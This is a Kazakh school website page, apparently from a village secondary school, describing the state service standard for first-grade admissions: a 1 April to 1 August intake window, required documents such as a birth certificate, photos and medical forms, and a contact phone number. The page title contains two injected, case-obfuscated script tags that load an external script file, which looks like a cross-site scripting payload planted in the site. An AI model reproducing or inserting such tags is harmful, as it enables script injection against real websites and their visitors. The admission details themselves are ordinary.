Білім беру ұйымдарына құжаттарды қабылдау және оқуға қабылдау бойынша Мемлекеттік көрсетілетін қызметтер стандарты (Бастауыш, негізгі орта, жалпы орта, арнайы)<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.04.2021

Құжаттарды қабылдау және 1-сыныпқа қабылдау мерзімі өзгерді.

Мемлекеттік қызмет көрсету тәртібі

Енді 1 сыныпқа құжаттарды қабылдау 2021 жылдың 1 сәуірінен басталады.

Мемлекеттік қызметті көрсету нысаны – электрондық.

Мемлекеттік қызмет Жеке тұлғаларға (бұдан әрі – көрсетілетін қызметті алушы) тегін көрсетіледі.

Көрсетілетін қызметті алушы көрсетілетін қызметті берушіге жүгінген кезде мемлекеттік қызметті көрсету үшін қажетті құжаттардың тізбесі:

1) ата-анасының бірінің (немесе өзге де заңды өкілдерінің) өтініші);

2) өтініш берушінің (ата-анасының немесе қамқоршысының) жеке басын куәландыратын құжат);

3) туу туралы куәліктің көшірмесі;

4) баланың 3х4 см көлеміндегі 2 фотосуреті;

5) №063/Е және №026/Е-3 нысаны бойынша денсаулық жағдайы туралы анықтама;

6) жеңілдіктер алуға құқық беретін құжат (тар);

Жалпы білім беретін мектептің 1-сыныбына оқуға түсу үшін құжаттарды қабылдау 1 сәуірден 1 тамызға дейін жүзеге асырылады.

Мемлекеттік қызмет көрсетудің барлық мәселелері бойынша "Біржан сал ауданы бойынша Макинка ауылының ЖОББМ" КММ жүгінуге болады байланыс телефоны 8(71639) 28144

Просмотров: 529


Пікір қосу



Деректерді қолтаңбаға қосу